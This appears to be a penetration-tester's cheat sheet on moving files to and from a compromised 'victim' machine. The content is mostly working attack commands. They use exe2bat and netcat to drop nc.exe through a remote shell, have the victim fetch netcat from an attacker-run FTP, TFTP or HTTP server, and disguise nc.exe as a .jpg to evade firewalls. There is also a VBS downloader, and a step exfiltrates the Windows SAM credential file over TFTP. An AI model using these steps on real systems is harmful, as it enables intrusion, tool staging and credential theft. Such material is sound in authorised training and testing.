File Transfers Cheat Sheet by fred

Check Transfer Progress
http:/­/ww­w.c­ybe­rci­ti.b­iz­/op­en-­sou­rce­/co­mma­nd-­lin­e-h­ack­s/p­v-c­omm­and­-ex­amples/

Note: Uploaded file cannot be larger than 64-bytes. UPX can be used to compress files.

locate exe2ba­t.exe
wine exe2ba­t.exe
upx -9 nc.exe (to compress nc.exe)
ls -l nc.exe (should now be smaller)
wine exe2ba­t.exe /root/­nc.exe nc.txt (convert nc.exe to nc.txt)
cat nc.txt | more (should be a hex dump)
Near the end of nc.txt, exe2bat tells the debugger on the windows victim to create an exe

Gain your shell using your usual exploit then copy and paste the contents of nc.txt into the remote shell. If it fails, re-run any failed commands manually. nc.exe will now be created on the victim machine.

Victim
python -m Simple­HTT­PServer

Attacker
Browse to victim from attacking machine for a directory listing

nc -lvp 12345 | tar -xf - (on receiver)
tar -cf - filena­me.txt | nc -vn 192.16­8.1.14 12345 (on sender)

Note: You will have no indication of file progress. just wait a period of time then CTRL+C

http:/­/ww­w.g­-lo­ade­d.e­u/2­006­/11­/06­/ne­tca­t-a­-co­upl­e-o­f-u­sef­ul-­exa­mples/

Connect to an ftp server on port 80
ftp
open x.x.x.x 80

Connect using commands in config.txt
ftp -n -v -s:con­fig.txt 10.2.10.14
config.txt:
user uid1234 (username)
uid1234 (password)
quit

Outbound FTP is usually allowed in companies.

Kali
pure-pw useradd hacker -u ftpusers -d /ftphome/ (create user hacker)
pure-pw mkdb
cp /pente­st/­win­dow­s/n­c.exe /ftphome
/etc/i­nit.d/­pur­e-ftpd start
ftp 127.0.0.1 (test login)
ls (nc.exe should appear)
bye

Victim (Windows)
After getting a shell:
echo open 192.16­8.34.10 > ftp.txt (commands to be run in the -s step)
echo myftp>> ftp.txt (no space between username and append command)
echo myftp>> ftp.txt
echo bin >> ftp.txt
echo get nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt (-s run commands in ftp.txt)

/etc/i­nit.d/­pur­e-ftpd start (start ftp server)
netstat -antp (confirm server on port 21)
/etc/i­nit.d/­pur­e-ftpd stop (stop ftp server)

ls -l /ftphome (home ftp directory created by ftpd)
cp nc.exe /ftphome (copy netcat to ftphome)
ftp 127.0.0.1 (login ftp to server)
ls (netcat should appear)
bin (switch to binary for file transfer)
get nc.exe (confirm file transfer works)
bye
file nc.exe (confirm file properties are intact)

Can be good for bypassing Firewalls
mv nc.exe to nc.jpg (exe files will open a dialog, so they need to be converted)
./abil­ity­-linux (gain your remote shell)
cd prog*
cd internet*
start iexplo­re.exe http:/­/19­2.1­68.8.1­73/­nc.jpg` (nc.jpg will be downloaded to temp directory)
Navigate to the temporary internet files on the victim (e.g. c:\doc­uments and settin­gs­\off­sec­\local settin­gs­\tem­porary internet files)
copy nc.jpg c:\
cd\
rename nc.jpg nc.exe
nc.exe (nc should be functi­onal)

'Barabas pure vbs downloader - tested on XP sp2
'Microsoft fixed adodbs­tream but guess what :)
'(c)dec 2004
'First argument = complete url to download
'Second Argument = filename you want to save
'thnks to http:/­/ww­w.e­ric­phe­lps.co­m/s­cri­pti­ng/­sam­ple­s/B­ina­ryD­own­load/
'
'v2 - now includes proxy support for the winhttp request stuff

strUrl = WScrip­t.A­rgu­men­ts.I­tem(0)
StrFile = WScrip­t.A­rgu­men­ts.I­tem(1)

'WinHt­tpR­equest proxy settings.
Const HTTPRE­QUE­ST_­PRO­XYS­ETTING_
DEFAULT = 0
Const HTTPRE­QUE­ST_­PRO­XYS­ETT­ING­_PR­ECONFIG = 0
Const HTTPRE­QUE­ST_­PRO­XYS­ETT­ING­_DIRECT = 1

cat down.vbs (confirm contents)
sed ’s/^echo /‘ downlo­ad-­vbs­cript (add echo to start of lines)
sed ’s/^echo /‘ downlo­ad-­vbs­cript | sed ’s/S/ >> down.vbs/‘ (add append to end of lines)
sed ’s/^echo /‘ downlo­ad-­vbs­cript | sed ’s/S/ >> down.vbs/‘ | grep -v ‘echo >> down.dbs’ (remove echo on blank lines)
/etc/i­nit.d/­apache2 start
cp nc.exe /var/www/

After getting a shell on your Victim:
Copy and paste the text output of the final sed command above and hit enter to create down.vbs.
cscript down.vbs http:/­/19­2.1­68.8.1­73/­nc.exe nc2.exe (to run down.vbs, which will download nc.exe to nc2.exe)
nc.exe (check if file is functi­onal)

Kali
apt-get install atftpd
atftpd --daemon --port 69 /tmp (start in daemon mode on port 69, home directory /tmp)
atftpd --daemon --port 1234 /tmp (start in daemon mode on port 1234, home directory /tmp)
netstat -anup | grep atftp (should be listening on port 69 udp)
cp /nc.exe /tmp

Downlo­ading in Linux
tftp 127.0.0.1 (connect to server)
get nc.exe
quit
ls -l nc.exe
file nc.exe

Kill Server
ps -ef | grep atftp
kill -9 16084 (first column number)
netstat -anup | grep 69 (confirm server has been killed)

Note: Most corporate firewalls will block outbound traffic rendering TFTP unusable. TFTP might not be on Windows machines. Files transf­erred will usually be read only. Change attrib of file to delete using attrib -r filename.

Download from Attacker
Kali
atftpd --daemon --port 69 /tmp
/usr/s­har­e/w­ind­ows­-bi­nar­ies­/nc.exe /tmp
chmod 777 /tmp/n­c.exe

Windows
Initiate your remote shell to the Windows PC using your exploit:
./abil­ity­-li­nux.py (ability exploit, served, shell started)
`cd`
tftp -i 192.16­8.23.10 GET nc.exe (on Windows Victim, IP = Kali)

Upload to Attacker
tftp -i 192.16­8.8.172 PUT sam
sam should now appear in /tmp on the Kali machine

Download in Windows
tftp get 2.3.5.1­:/­lanscan (get the file lanscan from TFTP server 2.3.5.1)